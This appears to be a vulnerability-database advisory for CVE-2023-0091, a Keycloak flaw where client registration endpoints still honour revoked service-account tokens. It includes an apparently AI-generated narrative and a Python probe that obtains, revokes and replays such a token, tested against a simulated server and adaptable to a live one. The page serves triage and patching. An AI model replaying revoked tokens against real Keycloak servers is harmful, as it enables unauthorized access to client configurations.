VYPR
Moderate severityNVD Advisory· Published Jan 11, 2023· Updated Apr 9, 2025

CVE-2023-0091

Description

A flaw was found in Keycloak, where it did not properly check client tokens for possible revocation in its client credential flow. This flaw allows an attacker to access or modify potentially sensitive information.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Keycloak's client registration endpoints do not check whether a service-account access token obtained through the client credentials grant has been revoked, so an attacker holding a leaked token can keep using it after revocation to read or change client configuration.

Vulnerability

CVE-2023-0091 is a flaw in Keycloak where the client registration endpoints do not check whether an access token has been revoked during the client credentials flow [1][2]. Even when a service account token is explicitly revoked, Keycloak continues to accept it on these endpoints for operations that require the create-client or manage-clients roles [4]. The root cause is missing revocation validation on these specific endpoints: the token is still honoured there until it expires on its own, so a short access-token lifespan narrows the exposure window but does not close it.

Exploitation

An attacker who obtains a leaked or stolen access token for a service account with sufficient privileges can use it against the client registration endpoints, even after the token owner has revoked it. No additional authentication is needed beyond possessing the revoked (but not yet expired) token. The attacker can then create new clients or modify existing client configurations [4]. The attack is performed over the network and requires nothing beyond the ability to send HTTP requests to the Keycloak server.
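The exchange described above, as an added example that is not part of this advisory or of Keycloak's own code: the script obtains a service-account token with the client credentials grant, revokes it at the RFC 7009 revocation endpoint, confirms through token introspection that the server now reports it inactive, and then replays it as a Bearer token on the client registration endpoint. A 200 on that last step, while introspection says the token is inactive, is the symptom this advisory describes. The endpoint paths are the defaults for a Keycloak install without a custom relative path; the base URL, realm, client ID and secret are placeholders; the service account is assumed to hold manage-clients and the realm is assumed to accept access-token revocation at the revoke endpoint. The `FakeKeycloak` class is a constructed offline stand-in, not Keycloak code, that simulates both the vulnerable and the patched behaviour so the script runs without a server.

```python
import base64
import json
import urllib.error
import urllib.parse
import urllib.request

# Default Keycloak endpoint paths (assumption: no custom relative path or legacy /auth prefix).
TOKEN_PATH = "/realms/{realm}/protocol/openid-connect/token"
REVOKE_PATH = "/realms/{realm}/protocol/openid-connect/revoke"
INTROSPECT_PATH = "/realms/{realm}/protocol/openid-connect/token/introspect"
CLIENT_REG_PATH = "/realms/{realm}/clients-registrations/default/{client_id}"


def http_transport(url, method, headers, body):
    """Live transport over urllib; returns (status code, response text)."""
    req = urllib.request.Request(url, data=body, method=method, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode()


def _basic_auth(client_id, client_secret):
    creds = base64.b64encode(f"{client_id}:{client_secret}".encode()).decode()
    return {"Authorization": f"Basic {creds}"}


def _post_form(transport, url, auth, fields):
    headers = {**auth, "Content-Type": "application/x-www-form-urlencoded"}
    return transport(url, "POST", headers, urllib.parse.urlencode(fields).encode())


def probe_revocation(transport, base_url, realm, client_id, client_secret):
    """Obtain, revoke and replay a service-account access token.

    accepts_revoked_token=True in the result is the behaviour this advisory describes:
    introspection reports the token inactive, yet the client registration endpoint
    still honours it.
    """
    def url(path):
        return base_url + path.format(realm=realm, client_id=client_id)

    auth = _basic_auth(client_id, client_secret)

    # 1. Client credentials grant: the service account's access token.
    status, body = _post_form(transport, url(TOKEN_PATH), auth, {"grant_type": "client_credentials"})
    if status != 200:
        raise RuntimeError(f"token request failed: {status} {body}")
    token = json.loads(body)["access_token"]

    # 2. Revoke it (RFC 7009 endpoint; assumes the realm accepts access-token revocation).
    status, _ = _post_form(transport, url(REVOKE_PATH), auth,
                           {"token": token, "token_type_hint": "access_token"})
    if status // 100 != 2:
        raise RuntimeError(f"revocation failed: {status}")

    # 3. Control: introspection must now report active=false.
    status, body = _post_form(transport, url(INTROSPECT_PATH), auth, {"token": token})
    active = bool(json.loads(body).get("active")) if status == 200 else None

    # 4. Replay the revoked token as a Bearer token on the client registration endpoint.
    status, _ = transport(url(CLIENT_REG_PATH), "GET", {"Authorization": f"Bearer {token}"}, None)
    return {"introspection_active": active,
            "registration_status": status,
            "accepts_revoked_token": status == 200}


class FakeKeycloak:
    """Constructed offline stand-in for a Keycloak server (not Keycloak code).

    vulnerable=True skips the revocation check on the registration endpoint, which
    is the flaw; vulnerable=False rejects revoked tokens there, as 20.0.3 does.
    """

    def __init__(self, vulnerable):
        self.vulnerable = vulnerable
        self.issued = set()
        self.revoked = set()

    def __call__(self, url, method, headers, body):
        fields = dict(urllib.parse.parse_qsl(body.decode())) if body else {}
        if url.endswith("/openid-connect/token"):
            tok = f"tok-{len(self.issued) + 1}"
            self.issued.add(tok)
            return 200, json.dumps({"access_token": tok, "token_type": "Bearer"})
        if url.endswith("/openid-connect/revoke"):
            self.revoked.add(fields.get("token"))
            return 200, ""
        if url.endswith("/token/introspect"):
            tok = fields.get("token")
            return 200, json.dumps({"active": tok in self.issued and tok not in self.revoked})
        if "/clients-registrations/default/" in url:
            tok = headers.get("Authorization", "").removeprefix("Bearer ")
            if tok not in self.issued or (tok in self.revoked and not self.vulnerable):
                return 401, json.dumps({"error": "invalid_token"})
            return 200, json.dumps({"clientId": "probe-client"})
        return 404, ""


if __name__ == "__main__":
    for label, server in (("vulnerable", FakeKeycloak(True)), ("patched", FakeKeycloak(False))):
        print(label, probe_revocation(server, "https://kc.example", "demo", "probe-client", "secret"))
    # Against a live server: probe_revocation(http_transport, "https://kc.example", "demo", ...)
```

The GET on the registration endpoint is deliberately read-only so the probe does not change the realm; the introspection call is the control that separates "revocation did not happen" from "revocation happened but the registration endpoint ignores it", which is the distinction that matters when triaging this flaw.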

Impact

Successful exploitation lets the attacker access or modify potentially sensitive information managed by Keycloak [2]. By creating or altering clients, for example by changing an existing client's redirect URIs or secret, the attacker could intercept authentication flows, gain unauthorized access to other applications, or exfiltrate data. The flaw directly undermines token revocation, a critical security control for identity and access management platforms, because an operator who revokes a compromised service-account token will believe the exposure is contained when it is not.

Mitigation

Red Hat has issued a fix in Keycloak version 20.0.3 and later [4] (Maven coordinates org.keycloak:keycloak-core). Organizations running affected versions (earlier than 20.0.3) should upgrade immediately. No workaround is documented; patching is the only recommended remediation. Until the upgrade is complete, treat any service-account token that may have leaked as live for its full remaining lifetime, regardless of whether it has been revoked.

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package: org.keycloak:keycloak-core (Maven)
Affected versions: < 20.0.3
Patched versions: 20.0.3

Affected products: 2

Patches: 0 (no patches discovered yet)


References: 4
